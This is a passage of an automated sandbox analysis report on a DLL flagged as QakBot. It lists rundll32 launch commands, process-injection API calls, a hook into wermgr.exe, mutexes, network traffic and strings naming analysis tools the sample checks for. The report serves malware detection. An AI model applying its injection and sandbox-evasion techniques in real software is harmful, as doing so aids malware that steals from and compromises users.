            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/DPoM7IMoctMoJZibhnSBMw--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/EtQws8V8gUWi7Lp0u6r4vg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/WPRptIkensEKSkqnDF0zXQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/mzPB3eeJrxJuAn9uOhK0cA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/nDSzKTzruwlGWD3tTOyQ6Q--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/tPwgVkehrxGaI0QqcXUdhg--~B/Zmk9c3RyaW07aD0xMjM7cT05NTt3PTIyMDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://s.yimg.com/uu/api/res/1.2/uoC01Si3ktPRn2o0u7VdqQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://search.yahoo.com/search?p=
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
            Source: distantly.dat.dllString found in binary or memory: https://www.digicert.com/CPS0
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://www.yahoo.com/
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://www.yahoo.com/px.gif
            Source: G00CXZJV.htm.23.drString found in binary or memory: https://yep.video.yahoo.com/oath/js/1/oath-player.js?ypv=8.5.43&lang=en-US
            Source: unknownDNS traffic detected: queries for: yahoo.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: yahoo.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.yahoo.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 74.6.143.25:443 -> 192.168.2.4:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.4:49714 version: TLS 1.2
            Source: loaddll32.exe, 00000001.00000002.569245168.000000000131B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: distantly.dat.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
            Source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 16.2.rundll32.exe.6c0960.0.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 16.2.rundll32.exe.6c0960.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 672
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ADAACE04_2_6ADAACE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ADA68804_2_6ADA6880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10018E2016_2_10018E20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10003A4016_2_10003A40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_100172EF16_2_100172EF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_100132F116_2_100132F1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10016F3016_2_10016F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10014B5316_2_10014B53
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_100144D8 NtProtectVirtualMemory,NtProtectVirtualMemory,16_2_100144D8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000A51F NtAllocateVirtualMemory,NtWriteVirtualMemory,16_2_1000A51F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000A93E GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,16_2_1000A93E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000AA38 GetLastError,NtResumeThread,FindCloseChangeNotification,16_2_1000AA38
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000CAF3 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,16_2_1000CAF3
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncryptsslp.dll
            Source: distantly.dat.dllStatic PE information: Number of sections : 15 > 10
            Source: distantly.dat.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\distantly.dat.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_block_row
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 672
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 652
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_sample_rows
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,ldiv_round_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_block_row
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_sample_rows
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",ldiv_round_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",next
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lround_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lpeg_write_tables
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 660
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_block_rowJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_sample_rowsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,ldiv_round_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_block_rowJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_sample_rowsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",ldiv_round_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",nextJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lround_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lpeg_write_tablesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Tnajlvradh
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1568.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winDLL@30/19@2/100
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000D2F7 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,16_2_1000D2F7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000C800 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,16_2_1000C800
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_block_row
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{E4806859-9E60-419F-A5F8-F8393694452A}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7352
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{835207F5-9512-40A7-9091-50270E43F0F8}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{835207F5-9512-40A7-9091-50270E43F0F8}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3912
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: distantly.dat.dllStatic PE information: More than 104 > 100 exports found
            Source: distantly.dat.dllStatic PE information: Image base 0x6ad80000 > 0x60000000
            Source: distantly.dat.dllStatic PE information: section name: /4
            Source: distantly.dat.dllStatic PE information: section name: /14
            Source: distantly.dat.dllStatic PE information: section name: /29
            Source: distantly.dat.dllStatic PE information: section name: /41
            Source: distantly.dat.dllStatic PE information: section name: /55
            Source: distantly.dat.dllStatic PE information: section name: /67
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_6AD814B0
            Source: distantly.dat.dllStatic PE information: real checksum: 0xac4ff should be: 0xb019f

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7524 base: 1023C50 value: E9 63 D7 B9 FF Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
